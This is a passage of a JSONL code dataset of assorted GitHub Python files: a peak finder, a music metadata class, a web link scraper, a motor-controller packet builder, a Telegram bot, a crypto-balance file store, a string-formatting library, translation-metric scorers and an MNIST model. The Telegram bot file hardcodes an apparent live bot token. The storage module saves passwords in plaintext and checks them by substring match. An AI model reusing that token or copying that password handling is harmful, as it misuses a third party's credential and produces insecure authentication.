peak_finder_random_search(y, n_peaks, n_trials)\n x_imp, S_imp, opt_imp = peak_finder_improve(y, S, opt)\n j = 0\n while opt_imp < opt:\n j += 1\n x,S,opt = x_imp, S_imp, opt_imp\n x_imp, S_imp, opt_imp = peak_finder_improve(y, S, opt)\n return S[::2],x,opt\n\ndef peak_finder_auto(y,n_peaks_max = 3, sensitivity=0.05):\n S_list = []\n x_list = []\n opt_list = []\n for n_peaks in range(n_peaks_max+2):\n\n S,x,opt = peak_finder(y,n_peaks)\n S_list.append(S)\n x_list.append(x)\n opt_list.append(opt)\n improvement = np.diff(-np.array(opt_list))\n n_peaks = 1\n while n_peaks < n_peaks_max and improvement[n_peaks] > sensitivity*improvement[n_peaks-1]:\n n_peaks += 1\n# n_peaks = np.argmax()\n return S_list[n_peaks], x_list[n_peaks], opt_list[n_peaks]","repo_name":"YutongWangUMich/peak_finder","sub_path":"peak_finder.py","file_name":"peak_finder.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20237298350","text":"class Song(object):\n \"음악의 메타 정보\"\n \n def __init__(self):\n self.dbid = ''\n self.uid = ''\n self.title = ''\n self.artist = ''\n self.url = ''\n self.img_url = ''\n self.description = ''\n self.duration = 0\n self.created_at = None\n self.played_count = 0\n\n def __str__(self):\n s = []\n s.append('Song: ')\n if(self.dbid):\n s.append(' - id: {}'.format(self.dbid))\n if(self.uid):\n s.append(' - uid: ' + self.uid) \n if(self.title):\n s.append(' - title: ' + self.title)\n if(self.artist):\n s.append(' - artist: ' + self.artist)\n if(self.url):\n s.append(' - url: ' + self.url)\n if(self.img_url):\n s.append(' - img: ' + self.img_url)\n s.append(' - played count: {}'.format(self.played_count))\n\n return '\\n'.join(s)\n\n def to_dict(self):\n ret = {}\n ret[\"dbid\"] = self.dbid\n ret[\"uid\"] = self.uid\n ret[\"title\"] = self.title\n ret[\"artist\"] = self.artist\n ret[\"url\"] = self.url\n ret[\"img_url\"] = self.img_url\n ret[\"description\"] = self.description\n ret[\"duration\"] = self.duration\n ret[\"created_at\"] = self.created_at\n ret[\"played_count\"] = self.played_count\n\n return ret\n","repo_name":"jinniahn/book_python_example","sub_path":"ch13/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"20108786382","text":"# -*- coding:utf-8 -*-\n\n\nfrom lxml import etree\n\n\ndef linkstr(content):\n dom = etree.HTML(content)\n try:\n if ('//*[@id=\"fcNav\"]/em/a[1]') != None:\n url_list = dom.xpath('//*[@id=\"fcNav\"]/em/a[1]')\n # 判断是否有其他二级域名\n if dom.xpath('//*[@id=\"fcNav\"]/em/a[2]') != None:\n url_list.append((dom.xpath('//*[@id=\"fcNav\"]/em/a[2]'))[0])\n if dom.xpath('//*[@id=\"fcNav\"]/em/a[3]') != None:\n url_list.append((dom.xpath('//*[@id=\"fcNav\"]/em/a[3]'))[0])\n except:\n print('官方个别分站内容未填充,已跳过。。。')\n\n\n second_link = []\n\n for urls in url_list:\n if len(urls.attrib) != 0:\n # print urls.attrib['href']\n second_link.append(urls.attrib['href'])\n\n # print second_link\n return second_link\n\n\nimport requests\nimport Useragent\n\n# url = \"http://qd.58.com\"\n\n# UA = {\"User-Agent\": Useragent.RandomUAMiddleware().process_request()}\n#\n#\n# def gethtml(url, *args):\n# html = requests.get(url, *args).content\n#\n# return html\n\n# def main():\n# linkstr()\n#\n# main()\n","repo_name":"Big-data-spider/58spider","sub_path":"pro_files/link2nd_tool.py","file_name":"link2nd_tool.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33988820452","text":"# coding=utf-8\r\nfrom utils import crcUtils\r\nfrom utils.crcUtils import CrcUtils\r\nfrom utils.strUtils import StrUtils\r\nfrom utils.byteUtils import ByteUtils\r\n\r\n\r\nclass RealInstruction:\r\n # 模式选项\r\n MODE_CLICK = 0x00 # 点动模式\r\n MODE_STEP = 0x01 # 单步模式\r\n MODE_AUTO = 0x02 # 自动模式\r\n MODE_RETURN = 0x03 # 单次往返\r\n MODE_RETURN_TIME = 0x04 # 按次往返\r\n MODE_CLICK_ZERO = 0x05 # 按键回零单方向\r\n MODE_FORWARD_ZERO = 0x06 # 前进回零往返模式\r\n MODE_DIRECTORY_ZERO = 0x07 # 单方向运行模式\r\n # 运动方向\r\n MOVE_PLUS = 0x01\r\n MOVE_MINUS = 0x02\r\n MOVE_STOP = 0x003\r\n # 标志位\r\n FLAG_LAUNCH = 0\r\n FLAG_ENABLE = 0\r\n FLAG_ZERO = 1\r\n FLAG_URGENT_STOP = 2\r\n FLAG_LIMIT_POSITION = 3\r\n FLAG_02_OUT = 4\r\n FLAG_SINGLE_SWITCH_TRIGGER = 5\r\n FLAG_INPUT_SWITCH_TRIGGER_DISABLED = 6\r\n FLAG_POSITION_CONTROL = 7\r\n\r\n def __init__(self):\r\n self.header = 0xBA # 包头\r\n self.mode = 0x00 # 运动模式\r\n\r\n self.frequencyDivision = 0x0000 # 分频基数,字节顺序:高位低位\r\n self.controllerCode = 0x00 # 控制器编号\r\n self.moveTime = 0x00 # 执行次数,(提示:只在04:按次往返模式时有效)\r\n self.moveDirectory = 0x01 # 01 :正运行02 :负运行03 :停止\r\n\r\n # 数据标志位\r\n self.moveFlag = 0x00 # 本字节拆分数据位8位11111111 (1:代表常开、使能启动 0:代表常闭、不启动)\r\n # 如例:11111111 (例中全部有效位) 代表:依次排序从左至右位,启动上电运行使能、启动上电回零使能、急停常开、限位常开、启动0.2 倍频率输出、启动单开关触发、启动输入开关失效、启动位置控制使能、\r\n # 例中串口应发数据:FF\r\n\r\n self.movePulse = 0x000000 # 行进脉冲总数高位、中位、低位\r\n self.acceleratePulse = 0x00 # 加速脉冲数高位、低\r\n self.deceleratePulse = 0x00 # 降速脉冲数高位、低\r\n self.crc = 0x00\r\n self.tail = 0xFE\r\n\r\n def package(self):\r\n byte_codes = bytearray()\r\n byte_codes.append(self.header)\r\n byte_codes.append(self.mode)\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.frequencyDivision))\r\n byte_codes.append(self.controllerCode)\r\n byte_codes.append(self.moveTime)\r\n byte_codes.append(self.moveDirectory)\r\n byte_codes.append(self.moveFlag)\r\n str_val = StrUtils.bytesToStr(byte_codes)\r\n print(str_val)\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes3(self.movePulse))\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.acceleratePulse))\r\n ByteUtils.concatBytes(byte_codes, ByteUtils.int2bytes2(self.deceleratePulse))\r\n crc = CrcUtils.GenModbusCRC8(byte_codes)\r\n byte_codes.append(crc)\r\n byte_codes.append(self.tail)\r\n return byte_codes\r\n\r\n\r\nif __name__ == '__main__':\r\n ins = RealInstruction()\r\n ins.package()\r\n","repo_name":"whw917/calibration_platform","sub_path":"pymac/entities/realInstruction.py","file_name":"realInstruction.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70477860242","text":"#!/usr/bin/python3\n\nimport telepot\nfrom time import sleep\n\nTOKEN = '971551324:AAGz8COn-WvxBWbbr_0N5bjeJVyIAAu487A'\n\ndef telegram_sendMessage(msg_telegram):\n TelegramBot = telepot.Bot(TOKEN)\n msg_counter = 0\n msg = TelegramBot.getUpdates()\n for element in msg:\n for key, value in element.items():\n if 'message' in key:\n chat_id = str(value['chat']['id']) # catchear si no existe chat_id\n print('mensaje ' + str(msg_counter) + ': ' + str(value['text']))\n msg_counter += 1\n TelegramBot.sendMessage(chat_id=chat_id, parse_mode = 'html', text='========================== ')\n TelegramBot.sendMessage(chat_id=chat_id, parse_mode = 'html', text='Nuevo mensaje: ' + str(msg_telegram))\n\n\nTelegramBot = telepot.Bot(TOKEN)\n#print(TelegramBot.getMe())\n#print(TelegramBot.getUpdates())\n\ni = 0\nwhile True:\n i += 1\n telegram_sendMessage('probando mensaje ' + str(i))\n sleep(5)\n","repo_name":"joagonzalez/ditella-siyt","sub_path":"src/api_example/telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70114156562","text":"from domain.Cryptobalance import *\nimport os\n\nstorage_folder = \"../storage\"\nscript_dir = os.path.dirname(os.path.abspath(__file__))\nfolder = os.path.join(script_dir, storage_folder)\n\ndef register_transaction(date,user_id,operation_type,symbol,amount,total_price):\n formate_date = str(date.strftime('%d/%m/%Y %H:%M:%S'))\n archivo=open(f'{folder}/user{user_id}/hystoric_file', 'a+')\n archivo.write(f'{formate_date}|{symbol}|{user_id}|{operation_type}|{str(amount)}|{str(total_price)} \\n')\n archivo.close()\n\ndef line_balance_register(logged_user,symbol,amount):\n newCriptobalance = Cryptobalance(symbol,amount)\n file=open(f'{folder}/user{logged_user}/balance.txt','a+') \n file.write(f'{newCriptobalance.symbol}|{newCriptobalance.amount}')\n file.close()\n\ndef user_registration(user_id,user_password):\n file=open(f'{folder}/users.txt', 'a+')\n file.write(f'USER:{user_id}|PW:{user_password}\\n')\n file.close()\n \ndef get_currencies_balance(user_id, symbol):\n balance_file = open(f'{folder}/user{user_id}/balance.txt', 'r')\n txt = balance_file.read()\n file_size = os.path.getsize(f'{folder}/user{user_id}/balance.txt')\n if file_size == 0:\n return {}\n balance_file.close()\n criptos_balance = {}\n for line in txt.splitlines():\n newCryptobalance = parse_reg(line)\n criptos_balance[newCryptobalance.symbol] = newCryptobalance\n\n return criptos_balance\n\ndef get_currencye_amount(user_id,symbol):\n balance = get_currencies_balance(user_id,symbol)\n if symbol in balance:\n return balance[symbol].amount\n\n return 0\n\n\ndef parse_reg(register):\n separator = register.split(\"|\")\n return Cryptobalance(separator[0],float(separator[1]))\n\ndef make_balance_reg(criptobalance):\n return (f'{criptobalance.symbol}|{criptobalance.amount} \\n')\n \ndef get_obj(symbol,amount):\n newCriptobalance = Cryptobalance(symbol,amount)\n return newCriptobalance\n \ndef get_criptobalance(user_id,symbol):\n balance = get_currencies_balance(user_id,symbol)\n if symbol in balance:\n return balance[symbol]\n else:\n return None\n\ndef last_userid():\n file = open(f'{folder}/users.txt', 'r')\n txt = file.read()\n file.close()\n lines = txt.splitlines()\n terms = txt.split(\"|\")\n for line in lines:\n termino = line.split(\"|\")\n x = termino[0]\n return x \n \ndef check_id_exist(user_id):\n\n with open(f'{folder}/users.txt') as txt:\n if f'USER:{user_id}' in txt.read():\n return True\n return False\n\ndef check_id_pass(user_id,user_password):\n file = open(f'{folder}/users.txt', 'r')\n txt = file.read()\n file.close()\n lines = txt.splitlines()\n terms = txt.split(\"|\")\n for line in lines:\n if f'USER:{user_id}|PW:{user_password}' in line:\n return True\n\n return False\n\ndef create_a_folder(user_id):\n if not os.path.exists(f'{folder}/user{user_id}'):\n os.makedirs(f'{folder}/user{user_id}')\n\ndef create_filebalance(user_id):\n file = open(f'{folder}/user{user_id}/balance.txt', 'w+')\n file.close()\n\n","repo_name":"franciscoo11/nextu-python","sub_path":"services/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40020292720","text":"'''\n# Fancy string formatting:\n\n\n'''\nimport string\nfrom .base import _NoValue, Formatter, Field, is_field\n\n\nclass PartialFormatter(Formatter):\n '''Partial string formatting!! Finally!\n\n Examples:\n >>> f = lambda x, *a, **kw: (x, pformat(x, *a, **kw))\n\n >>> print(f('{a}/b/{c}/d/{e}', e='eee'))\n ... print(f('{a:s}/b/{c!s:s}/d/{e}', e='eee'))\n ... print(f('{}/b/{}/d/{}', 'aaa', 'ccc'))\n ... print(f('{:s}/b/{}/d/{:s}', 'aaa', 'ccc'))\n ...\n ('{a}/b/{c}/d/{e}', '{a}/b/{c}/d/eee')\n ('{}/b/{}/d/{}', 'aaa/b/ccc/d/{}')\n ('{a:s}/b/{c!s:s}/d/{e}', '{a:s}/b/{c!s:s}/d/eee')\n ('{:s}/b/{}/d/{:s}', 'aaa/b/ccc/d/{:s}')\n\n ## Partial Formatting:\n\n ### The Problem:\n You have multiple variables that you want to substitute in\n ```python\n name = '{param1}_{param2}/{id}/{loss:.2f}.csv'\n\n def run_hypersearch(name, params):\n for p in params:\n name_i = name.format(**p)\n os.makedirs(os.path.dirname(name_i))\n run_test(name_i, build_experiments(**p), p)\n\n IDS = [...]\n\n def run_test(name, exps, format_args):\n for id in IDS:\n do_something_and_write_to_file(exps[id], name, dict(format_args, id=id))\n\n\n def do_something_and_write_to_file(exp, name, format_args):\n ...\n\n\n run_hypersearch(name, [{}, ...])\n\n ```\n\n ### The Solution\n ```python\n name = '{param1}_{param2}/{id}{loss:.2f}.csv'\n\n def run_hypersearch(name, params):\n for p in params:\n name_i = pf.pformat(name, **p)\n os.makedirs(os.path.dirname(name_i))\n run_test(name_i, build_experiments(**p))\n\n IDS = [...]\n\n def run_test(name, exps):\n for id in IDS:\n do_something_and_write_to_file(exps[id], pf.pformat(name, id=id))\n\n run_hypersearch(name, [{}, ...])\n ```\n\n\n '''\n def missing_field_value(self, obj):\n return obj.field\n\n\nclass GlobFormatter(Formatter):\n '''\n ## Glob Formatting:\n\n For any missing keys, an asterisk will be inserted indicating a wildcard for glob searching.\n\n ### The Problem:\n You want to define a file pattern that works to define a single file or a glob\n pattern of files.\n\n ```python\n import glob\n\n file_pattern = '{}/loss_{}'\n file = file_pattern.format('abc', 1/3.)\n assert file == 'abc/loss_0.3333333333333333333'\n ```\n\n So then you say: \"I only really want two decimal places of accuracy\".\n ```python\n file_pattern = '{}/loss_{:.2f}'\n assert file_pattern.format('abc', 1/3.) == 'abc/loss_0.33'\n ```\n\n Works, but,,, now you want to get all files matching the pattern:\n ```python\n assert file_pattern.format('abc', '*') == 'abc/loss_*'\n # raises ValueError because '*' can't be formatted using `:.2f`\n ```\n\n ### The Solution:\n Using `pformat.gformat`, any missing keys will be replaced with an asterisk.\n ```python\n import pformat as pf\n\n file_pattern = '{}/loss_{:.2f}'\n assert pf.gformat(file_pattern, 'abc', 1/3.) == 'abc/loss_0.33'\n assert pf.gformat(file_pattern, 'abc') == 'abc/loss_*'\n ```\n\n '''\n def missing_field_value(self, obj):\n return '*'\n\n\nclass RegexFormatter(string.Formatter):\n '''Regex match formatting\n Make sure that a string matches a regular expression before inserting.\n\n Example\n -------\n >>> rformat(r'{i:/\\\\d[^\\\\d]*/}', i='3aasdfasdf')\n '3aasdfasdf'\n >>> rformat(r'{i:/\\\\d[^\\\\d]*/}', i='a3aasdfasdf')\n ---------------------------------------------------------------------------\n ValueError Traceback (most recent call last)\n ...\n ValueError: Input (a3aasdfasdf) did not match the regex pattern `/\\\\d[^\\\\d]*/`\n '''\n def format_field(self, obj, format_spec):\n import re\n if format_spec.startswith('/') and format_spec.endswith('/'):\n obj = str(obj) # coerce to string for re\n if not re.match(format_spec[1:-1], obj):\n raise ValueError(\n 'Input ({}) did not match the regex pattern ({})'.format(\n obj, format_spec))\n\n return obj\n return super().format_field(obj, format_spec)\n\n\n# formatter_field_name_split = string.Formatter.__module__._string.formatter_field_name_split\n\nclass DefaultFormatter(Formatter):\n '''\n ## Default Value Formatting:\n\n As a generalization of Glob Formatting, you can specify a custom default\n value for each field within the format string.\n\n ## The Problem:\n You're wishing that you could specify default values per field, but it's cumbersome\n to handle, especially with type specific format rules\n ```python\n file_pattern = '{name}/loss_{loss:.2f}'\n assert file_pattern.format(name='abc', loss=1/3.) == 'abc/loss_0.33'\n assert file_pattern.format(name='abc') == 'abc/loss_'\n # raises KeyError - missing `loss`\n assert file_pattern.format(name='abc', loss=results.get('loss', '--')) == 'abc/loss_--'\n # raises ValueError - can't format '--' using `:.2f`\n ```\n\n ### The Solution:\n Using `pformat.dformat`, default values can be specified which bypass the format rules.\n ```python\n import pformat as pf\n\n file_pattern = '{name}/loss_{loss._[--]:.2f}'\n assert file_pattern.format(name='abc', loss=1/3.) == 'abc/loss_0.33'\n assert file_pattern.format(name='abc') == 'abc/loss_--'\n ```\n\n ```python\n\n ```\n '''\n DEFAULT_ATTR = '_'\n\n def get_default_pattern_key_value(self, key):\n rest = list(string._string.formatter_field_name_split(key)[1])\n\n if len(rest) >= 2:\n # check the last two attributes to see if it matches: *._[default_value]\n [(is_attr1, val1), (is_attr2, val2)] = rest[-2:]\n if not is_attr2 and (\n self.DEFAULT_ATTR or is_attr1 and val1 == self.DEFAULT_ATTR):\n\n # split off the default value\n split_id = ('.{}'.format(self.DEFAULT_ATTR)\n if self.DEFAULT_ATTR else '') + '['\n\n key2 = key.rsplit(split_id, 1)[0]\n return key2, val2\n return None, None\n\n\n def missing_field(self, e, key, a, kw):\n # get key minus the default indicator + value\n # e.g. {x._[no value]} => {x} where \"no value\" will be returned if x is missing\n # basically: `key2, val2 = 'x', 'no value'`\n key2, val2 = self.get_default_pattern_key_value(key)\n if key2:\n # get the field using the modified key\n field, key3 = super().get_field(key2, a, kw)\n # if is still a missing field\n if is_field(field) and field.missing:\n # use default value (and original key)\n field.key, field.value = key, val2\n return field, key\n return field, key3\n\n # no default\n return super().missing_field(e, key, a, kw)\n\n\ndef multiformatter(*formatters):\n '''\n import pformat as pf\n xformat = multiformatter(pf.DEFAULT, pf.PARTIAL).format\n xformat('{x._[--]:.2f}{unit}')\n '''\n return type('MultiFormatter', tuple(*formatters), {})\n","repo_name":"beasteers/pformat","sub_path":"pformat/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"19874124070","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nfrom sacrebleu import sentence_bleu, sentence_chrf\nfrom comet import download_model, load_from_checkpoint\n\n\nclass Scorer(object):\n\n def __call__(self, tsv_f: pd.DataFrame) -> None:\n raise NotImplementedError\n\n\nclass BLEUScorer(Scorer):\n\n def __call__(self, tsv_f: pd.DataFrame) -> None:\n tsv_f['bleu-good'] = [sentence_bleu(hyp, [ref]).score for hyp, ref\n in zip(tsv_f['good-translation'],\n tsv_f['reference'])]\n tsv_f['bleu-bad'] = [sentence_bleu(hyp, [ref]).score for hyp, ref\n in zip(tsv_f['incorrect-translation'],\n tsv_f['reference'])]\n\n\nclass CHRFScorer(Scorer):\n\n def __call__(self, tsv_f: pd.DataFrame) -> None:\n tsv_f['chrf-good'] = [sentence_chrf(hyp, [ref]).score for hyp, ref\n in zip(tsv_f['good-translation'],\n tsv_f['reference'])]\n tsv_f['chrf-bad'] = [sentence_chrf(hyp, [ref]).score for hyp, ref\n in zip(tsv_f['incorrect-translation'],\n tsv_f['reference'])]\n\n\nclass COMETScorer(Scorer):\n\n def __init__(self,\n model_path: str='wmt20-comet-da',\n use_reference: bool=True,\n gpus: int=1,\n batch_size: int=16) -> None:\n self.prefix= 'comet'\n if not use_reference:\n assert 'qe' in model_path\n self.prefix = 'cometQE'\n model_path = download_model(model_path)\n self.model = load_from_checkpoint(model_path)\n self.gpus = gpus\n self.batch_size = batch_size\n\n def __call__(self, tsv_f: pd.DataFrame) -> None:\n data = {'src': tsv_f['source'],\n 'mt': tsv_f['good-translation'],\n 'ref': tsv_f['reference']}\n data = [dict(zip(data, t)) for t in zip(*data.values())]\n tsv_f[self.prefix+'-good'], _ = self.model.predict(data,\n gpus=self.gpus,\n batch_size=self.batch_size)\n\n data = {'src': tsv_f['source'],\n 'mt': tsv_f['incorrect-translation'],\n 'ref': tsv_f['reference']}\n data = [dict(zip(data, t)) for t in zip(*data.values())]\n tsv_f[self.prefix+'-bad'], _ = self.model.predict(data,\n gpus=self.gpus,\n batch_size=self.batch_size)\n","repo_name":"nikitacs16/mt-marathon-22-comet","sub_path":"breakit/scorers.py","file_name":"scorers.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"482648514","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\n# Load the MNIST dataset\n(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n# Normalize the pixel values to be between 0 and 1\nx_train = x_train.astype(\"float32\") / 255\nx_test = x_test.astype(\"float32\") / 255\n\n# Define the model architecture\nwith tf.device('/GPU:0'):\n model = keras.Sequential([\n keras.Input(shape=(28, 28)),\n layers.Flatten(),\n layers.Dense(128, activation=\"relu\"),\n layers.Dense(10),\n ])\n\n # Compile the model\n model.compile(\n optimizer=\"adam\",\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[\"accuracy\"]\n )\n\n # Train the model\n model.fit(x_train, y_train, epochs=10, validation_data=(x_test, y_test))\n\n# Evaluate the model on the test data\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)\nprint(f\"Test accuracy: {test_acc}\")","repo_name":"Werby213/pythonl","sub_path":"CV2PPG/CRR/my_projects/!NEURAL/CPM.py","file_name":"CPM.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}